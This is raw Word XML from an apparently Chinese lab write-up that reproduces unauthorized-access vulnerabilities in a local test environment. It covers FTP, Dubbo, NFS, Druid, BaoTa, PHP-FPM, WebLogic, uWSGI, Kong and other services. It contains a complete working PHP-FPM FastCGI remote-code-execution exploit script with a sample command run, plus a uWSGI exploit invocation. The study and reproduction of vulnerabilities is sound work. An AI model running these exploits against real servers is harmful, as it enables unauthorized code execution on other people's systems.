              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="4F4F4F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sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>post</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1204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pStyle w:val="1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20" w:lineRule="atLeast"/>
              <w:ind w:left="0" w:right="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="4F4F4F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sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>/shutdown</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5464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pStyle w:val="1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20" w:lineRule="atLeast"/>
              <w:ind w:left="0" w:right="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="4F4F4F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sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>关闭应用程序，要求 endpoints.shutdown.enabled 设置为 true（默认为 false）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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452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7F7F7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pStyle w:val="1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20" w:lineRule="atLeast"/>
              <w:ind w:left="0" w:right="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="4F4F4F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sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>get</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1204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7F7F7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pStyle w:val="1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20" w:lineRule="atLeast"/>
              <w:ind w:left="0" w:right="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="4F4F4F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sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>/trace</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5464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7F7F7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pStyle w:val="1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20" w:lineRule="atLeast"/>
              <w:ind w:left="0" w:right="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="4F4F4F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sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>提供基本的 HTTP 请求跟踪信息（时间戳、HTTP 头等）             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56" w:name="_Toc1288"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>FTP未授权访问漏洞</w:t>
      </w:r>
      <w:bookmarkEnd w:id="56"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="57" w:name="_Toc28981"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>环境部署</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5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使用centos7自带的vsftpd</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="58" w:name="_Toc31940"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>漏洞复现</w:t>
      </w:r>
      <w:bookmarkEnd w:id="58"/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"ftp://192.168.131.128/"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ftp://192.168.131.128/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r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3892550" cy="2101850"/>
            <wp:effectExtent l="0" t="0" r="6350" b="6350"/>
            <wp:docPr id="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92550" cy="210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59" w:name="_Toc2819"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>dubbo未授权访问漏洞</w:t>
      </w:r>
      <w:bookmarkEnd w:id="59"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="60" w:name="_Toc10738"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>环境部署</w:t>
      </w:r>
      <w:bookmarkEnd w:id="60"/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参考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"https://www.jianshu.com/p/e73d9f3576dd"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https://www.jianshu.com/p/e73d9f3576dd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部署dubbo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61" w:name="_Toc6868"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>漏洞复现</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6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弱口令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http://192.168.131.128:8888 ,     root/root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247265"/>
            <wp:effectExtent l="0" t="0" r="8890" b="635"/>
            <wp:docPr id="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908810"/>
            <wp:effectExtent l="0" t="0" r="3810" b="8890"/>
            <wp:docPr id="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08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其他利用方法可参考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"https://blog.csdn.net/qq_29277155/article/details/108390891"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https://blog.csdn.net/qq_29277155/article/details/108390891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/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>）：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924300" cy="1162050"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="73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 descr="IMG_25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76825" cy="1885950"/>
            <wp:effectExtent l="0" t="0" r="3175" b="6350"/>
            <wp:docPr id="74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 descr="IMG_25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pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="62" w:name="_Toc7950"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>NFS未授权访问漏洞</w:t>
      </w:r>
      <w:bookmarkEnd w:id="62"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="63" w:name="_Toc3562"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>环境部署</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6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~]# service rpcbind start &amp;&amp; service nfs start;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 /etc/exports 指定共享目录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jean]# cat /etc/exports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/home/xxx/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64" w:name="_Toc3627"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>漏洞复现</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6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showmount -e localhost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r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3022600" cy="609600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="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65" w:name="_Toc10395"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Druid未授权访问漏洞</w:t>
      </w:r>
      <w:bookmarkEnd w:id="65"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="66" w:name="_Toc17062"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>环境部署</w:t>
      </w:r>
      <w:bookmarkEnd w:id="66"/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参考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"https://github.com/Fokko/docker-druid"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https://github.com/Fokko/docker-druid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部署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"http://192.168.131.128:8888/unified-console.html"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5"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>http://192.168.131.128:8888/unified-console.html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia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5271770" cy="1671320"/>
            <wp:effectExtent l="0" t="0" r="11430" b="5080"/>
            <wp:docPr id="7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71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67" w:name="_Toc18342"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>漏洞复现</w:t>
      </w:r>
      <w:bookmarkEnd w:id="67"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN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复现失败，复现可参考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"https://www.cnblogs.com/cwkiller/p/12483223.html"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https://www.cnblogs.com/cwkiller/p/12483223.html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68" w:name="_Toc20912"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Windows ipc共享未授权访问漏洞</w:t>
      </w:r>
      <w:bookmarkEnd w:id="68"/>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4318000" cy="1479550"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="7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47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84600" cy="1460500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="7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146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69" w:name="_Toc28962"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>宝塔未授权访问漏洞</w:t>
      </w:r>
      <w:bookmarkEnd w:id="69"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="70" w:name="_Toc10"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>环境部署</w:t>
      </w:r>
      <w:bookmarkEnd w:id="70"/>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5263515" cy="2541905"/>
            <wp:effectExtent l="0" t="0" r="6985" b="10795"/>
            <wp:docPr id="8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41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bookmarkStart w:id="71" w:name="_Toc22983"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>漏洞复现</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7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使用24.1的环境复现失败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复现可参考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"https://www.cnblogs.com/bflw/p/13552367.html"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https://www.cnblogs.com/bflw/p/13552367.html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45100" cy="2421890"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="79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3" descr="IMG_25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421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72" w:name="_Toc3741"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>PHP-FPM Fastcgi未授权访问漏洞</w:t>
      </w:r>
      <w:bookmarkEnd w:id="72"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="73" w:name="_Toc27048"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>环境部署</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7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[root@localhsot vulhub-master]# cd fpm/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[root@localhsot fpm]# ls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1.jpg  docker-compose.yml  README.md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[root@localhsot fpm]# docker-compose build&amp;&amp;docker-compose up -d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74" w:name="_Toc27861"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>漏洞复现</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7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使用exp进行复现：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socket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random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argparse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sys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 io import BytesIO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Referrer: https://github.com/wuyunfeng/Python-FastCGI-Client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PY2 = True if sys.version_info.major == 2 else False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 bchr(i):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if PY2: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force_bytes(chr(i))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else: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bytes([i])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 bord(c):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if isinstance(c, int):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c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else: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ord(c)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 force_bytes(s):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if isinstance(s, bytes):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s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else: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s.encode('utf-8', 'strict')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 force_text(s):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if issubclass(type(s), str):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s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if isinstance(s, bytes):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 = str(s, 'utf-8', 'strict')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else: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 = str(s)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return s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 FastCGIClient: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"""A Fast-CGI Client for Python"""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private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__FCGI_VERSION = 1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__FCGI_ROLE_RESPONDER = 1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__FCGI_ROLE_AUTHORIZER = 2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__FCGI_ROLE_FILTER = 3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__FCGI_TYPE_BEGIN = 1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__FCGI_TYPE_ABORT = 2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__FCGI_TYPE_END = 3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__FCGI_TYPE_PARAMS = 4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__FCGI_TYPE_STDIN = 5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__FCGI_TYPE_STDOUT = 6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__FCGI_TYPE_STDERR = 7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__FCGI_TYPE_DATA = 8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__FCGI_TYPE_GETVALUES = 9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__FCGI_TYPE_GETVALUES_RESULT = 10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__FCGI_TYPE_UNKOWNTYPE = 11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__FCGI_HEADER_SIZE = 8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request state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FCGI_STATE_SEND = 1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FCGI_STATE_ERROR = 2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FCGI_STATE_SUCCESS = 3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def __init__(self, host, port, timeout, keepalive):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self.host = host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self.port = port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self.timeout = timeout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if keepalive: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self.keepalive = 1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else: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self.keepalive = 0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self.sock = None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self.requests = dict()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def __connect(self):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self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)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self.sock.settimeout(self.timeout)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self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)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 if self.keepalive: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     self.sock.setsockopt(socket.SOL_SOCKET, socket.SOL_KEEPALIVE, 1)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 else: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     self.sock.setsockopt(socket.SOL_SOCKET, socket.SOL_KEEPALIVE, 0)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try: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self.sock.connect((self.host, int(self.port)))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except socket.error as msg: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self.sock.close()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self.sock = None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print(repr(msg))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return False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True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def __encodeFastCGIRecord(self, fcgi_type, content, requestid):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length = len(content)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buf = bchr(FastCGIClient.__FCGI_VERSION) \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+ bchr(fcgi_type) \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+ bchr((requestid &gt;&gt; 8) &amp; 0xFF) \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+ bchr(requestid &amp; 0xFF) \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+ bchr((length &gt;&gt; 8) &amp; 0xFF) \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+ bchr(length &amp; 0xFF) \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+ bchr(0) \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+ bchr(0) \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+ content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buf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def __encodeNameValueParams(self, name, value):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nLen = len(name)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vLen = len(value)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record = b''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if nLen &lt; 128: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record += bchr(nLen)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else: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record += bchr((nLen &gt;&gt; 24) | 0x80) \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+ bchr((nLen &gt;&gt; 16) &amp; 0xFF) \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+ bchr((nLen &gt;&gt; 8) &amp; 0xFF) \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+ bchr(nLen &amp; 0xFF)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if vLen &lt; 128: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record += bchr(vLen)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else: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record += bchr((vLen &gt;&gt; 24) | 0x80) \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+ bchr((vLen &gt;&gt; 16) &amp; 0xFF) \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+ bchr((vLen &gt;&gt; 8) &amp; 0xFF) \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+ bchr(vLen &amp; 0xFF)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record + name + value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def __decodeFastCGIHeader(self, stream):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header = dict()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header['version'] = bord(stream[0])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header['type'] = bord(stream[1])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header['requestId'] = (bord(stream[2]) &lt;&lt; 8) + bord(stream[3])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header['contentLength'] = (bord(stream[4]) &lt;&lt; 8) + bord(stream[5])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header['paddingLength'] = bord(stream[6])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header['reserved'] = bord(stream[7])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header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def __decodeFastCGIRecord(self, buffer):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header = buffer.read(int(self.__FCGI_HEADER_SIZE))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if not header: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return False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else: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record = self.__decodeFastCGIHeader(header)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record['content'] = b''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if 'contentLength' in record.keys():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contentLength = int(record['contentLength'])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record['content'] += buffer.read(contentLength)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if 'paddingLength' in record.keys():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skiped = buffer.read(int(record['paddingLength']))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return record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def request(self, nameValuePairs={}, post=''):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if not self.__connect():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print('connect failure! please check your fasctcgi-server !!')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return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requestId = random.randint(1, (1 &lt;&lt; 16) - 1)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self.requests[requestId] = dict()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request = b""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beginFCGIRecordContent = bchr(0) \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   + bchr(FastCGIClient.__FCGI_ROLE_RESPONDER) \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   + bchr(self.keepalive) \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   + bchr(0) * 5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request += self.__encodeFastCGIRecord(FastCGIClient.__FCGI_TYPE_BEGIN,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                beginFCGIRecordContent, requestId)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paramsRecord = b''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if nameValuePairs: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for (name, value) in nameValuePairs.items():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name = force_bytes(name)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value = force_bytes(value)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paramsRecord += self.__encodeNameValueParams(name, value)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if paramsRecord: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request += self.__encodeFastCGIRecord(FastCGIClient.__FCGI_TYPE_PARAMS, paramsRecord, requestId)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request += self.__encodeFastCGIRecord(FastCGIClient.__FCGI_TYPE_PARAMS, b'', requestId)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if post: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request += self.__encodeFastCGIRecord(FastCGIClient.__FCGI_TYPE_STDIN, force_bytes(post), requestId)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request += self.__encodeFastCGIRecord(FastCGIClient.__FCGI_TYPE_STDIN, b'', requestId)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self.sock.send(request)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self.requests[requestId]['state'] = FastCGIClient.FCGI_STATE_SEND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self.requests[requestId]['response'] = b''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self.__waitForResponse(requestId)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def __waitForResponse(self, requestId):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data = b''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while True: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buf = self.sock.recv(512)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if not len(buf):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break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data += buf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data = BytesIO(data)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while True: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response = self.__decodeFastCGIRecord(data)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if not response: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break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if response['type'] == FastCGIClient.__FCGI_TYPE_STDOUT \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or response['type'] == FastCGIClient.__FCGI_TYPE_STDERR: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if response['type'] == FastCGIClient.__FCGI_TYPE_STDERR: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self.requests['state'] = FastCGIClient.FCGI_STATE_ERROR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if requestId == int(response['requestId']):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self.requests[requestId]['response'] += response['content']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if response['type'] == FastCGIClient.FCGI_STATE_SUCCESS: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self.requests[requestId]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self.requests[requestId]['response']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def __repr__(self):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"fastcgi connect host:{} port:{}".format(self.host, self.port)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__name__ == '__main__':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parser = argparse.ArgumentParser(description='Php-fpm code execution vulnerability client.')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parser.add_argument('host', help='Target host, such as 127.0.0.1')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parser.add_argument('file', help='A php file absolute path, such as /usr/local/lib/php/System.php')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parser.add_argument('-c', '--code', help='What php code your want to execute', default='&lt;?php phpinfo(); exit; ?&gt;')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parser.add_argument('-p', '--port', help='FastCGI port', default=9000, type=int)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args = parser.parse_args()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client = FastCGIClient(args.host, args.port, 3, 0)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params = dict()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documentRoot = "/"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uri = args.file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content = args.code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params = {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'GATEWAY_INTERFACE': 'FastCGI/1.0',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'REQUEST_METHOD': 'POST',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'SCRIPT_FILENAME': documentRoot + uri.lstrip('/'),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'SCRIPT_NAME': uri,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'QUERY_STRING': '',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'REQUEST_URI': uri,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'DOCUMENT_ROOT': documentRoot,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'SERVER_SOFTWARE': 'php/fcgiclient',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'REMOTE_ADDR': '127.0.0.1',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'REMOTE_PORT': '9985',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'SERVER_ADDR': '127.0.0.1',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'SERVER_PORT': '80',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'SERVER_NAME': "localhost",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'SERVER_PROTOCOL': 'HTTP/1.1',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'CONTENT_TYPE': 'application/text',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'CONTENT_LENGTH': "%d" % len(content),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'PHP_VALUE': 'auto_prepend_file = php://input',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'PHP_ADMIN_VALUE': 'allow_url_include = On'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response = client.request(params, content)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print(force_text(response))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D:\hw&gt;python php.py 192.168.131.128 /usr/local/lib/php/PEAR.php -c "&lt;?php echo `id`;exit;?&gt;"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379470"/>
            <wp:effectExtent l="0" t="0" r="9525" b="11430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79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75" w:name="_Toc25492"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Weblogic未授权访问漏洞</w:t>
      </w:r>
      <w:bookmarkEnd w:id="75"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="76" w:name="_Toc1776"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>环境部署</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7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[root@localhsot weblogic]# cd CVE-2018-2894/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[root@localhsot CVE-2018-2894]# docker-compose build&amp;&amp;docker-compose up -d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77" w:name="_Toc11455"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>漏洞复现</w:t>
      </w:r>
      <w:bookmarkEnd w:id="77"/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无需登录，直接未授权访问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"http://192.168.131.128:7001/ws_utc/config.do"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http://192.168.131.128:7001/ws_utc/config.do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r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5269865" cy="2211070"/>
            <wp:effectExtent l="0" t="0" r="635" b="11430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1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78" w:name="_Toc22427"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>uWSGI未授权访问漏洞</w:t>
      </w:r>
      <w:bookmarkEnd w:id="78"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="79" w:name="_Toc24155"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>环境部署</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7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[root@localhsot vulhub-master]# cd uwsgi/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[root@localhsot uwsgi]# ls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CVE-2018-7490  unacc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[root@localhsot uwsgi]# cd unacc/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[root@localhsot unacc]# docker-compose build&amp;&amp;docker-compose up -d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80" w:name="_Toc24464"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>漏洞复现</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8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使用以下exp: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"https://github.com/wofeiwo/webcgi-exploits/blob/master/python/uwsgi_exp.py"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https://github.com/wofeiwo/webcgi-exploits/blob/master/python/uwsgi_exp.py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执行：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D:\hw&gt;python test.py -u 192.168.131.128:8000 -c "touch /tmp/20201125"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r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5269230" cy="865505"/>
            <wp:effectExtent l="0" t="0" r="1270" b="10795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65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成功创建文件：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="1892300" cy="355600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="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355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尝试获取shell，未成功。。。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81" w:name="_Toc22854"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>WordPress未授权访问漏洞</w:t>
      </w:r>
      <w:bookmarkEnd w:id="81"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="82" w:name="_Toc31509"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>环境部署</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8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略。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="83" w:name="_Toc5125"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>漏洞复现</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8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可参考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"https://www.cnblogs.com/bflw/p/12342845.html"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https://www.cnblogs.com/bflw/p/12342845.html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84" w:name="_Toc3214"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Kong未授权访问漏洞(CVE-2020-11710)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="84"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="85" w:name="_Toc23960"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>环境部署</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8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略。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="86" w:name="_Toc27774"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>漏洞复现</w:t>
      </w:r>
      <w:bookmarkEnd w:id="86"/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复现可参考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"https://xz.aliyun.com/t/7631"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https://xz.aliyun.com/t/7631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pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="87" w:name="_Toc25581"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>ThinkAdminV6未授权访问漏洞</w:t>
      </w:r>
      <w:bookmarkEnd w:id="87"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="88" w:name="_Toc21162"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>环境部署</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8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略。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="89" w:name="_Toc771"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>漏洞复现</w:t>
      </w:r>
      <w:bookmarkEnd w:id="89"/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可参考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"https://www.cnblogs.com/cn-gov/p/13715861.html"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https://www.cnblogs.com/cn-gov/p/13715861.html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90" w:name="_Toc18748"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>参考</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9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未授权访问漏洞总结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"https://www.freebuf.com/articles/web/207877.html"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https://www.freebuf.com/articles/web/207877.html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未授权访问漏洞总结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"https://www.cnblogs.com/csnd/p/11807650.html"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https://www.cnblogs.com/csnd/p/11807650.html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未授权访问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"https://www.yuque.com/cheng-4ueio/tow7i5/uugb6t"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https://www.yuque.com/cheng-4ueio/tow7i5/uugb6t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26种未授权访问漏洞总结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"https://blog.csdn.net/qq_29277155/article/details/108390891"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https://blog.csdn.net/qq_29277155/article/details/108390891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6CB4B7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="096CB4B7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D2D6CE8"/>
    <w:rsid w:val="00694981"/>
    <w:rsid w:val="00701C30"/>
    <w:rsid w:val="00EC23E1"/>
    <w:rsid w:val="012F6400"/>
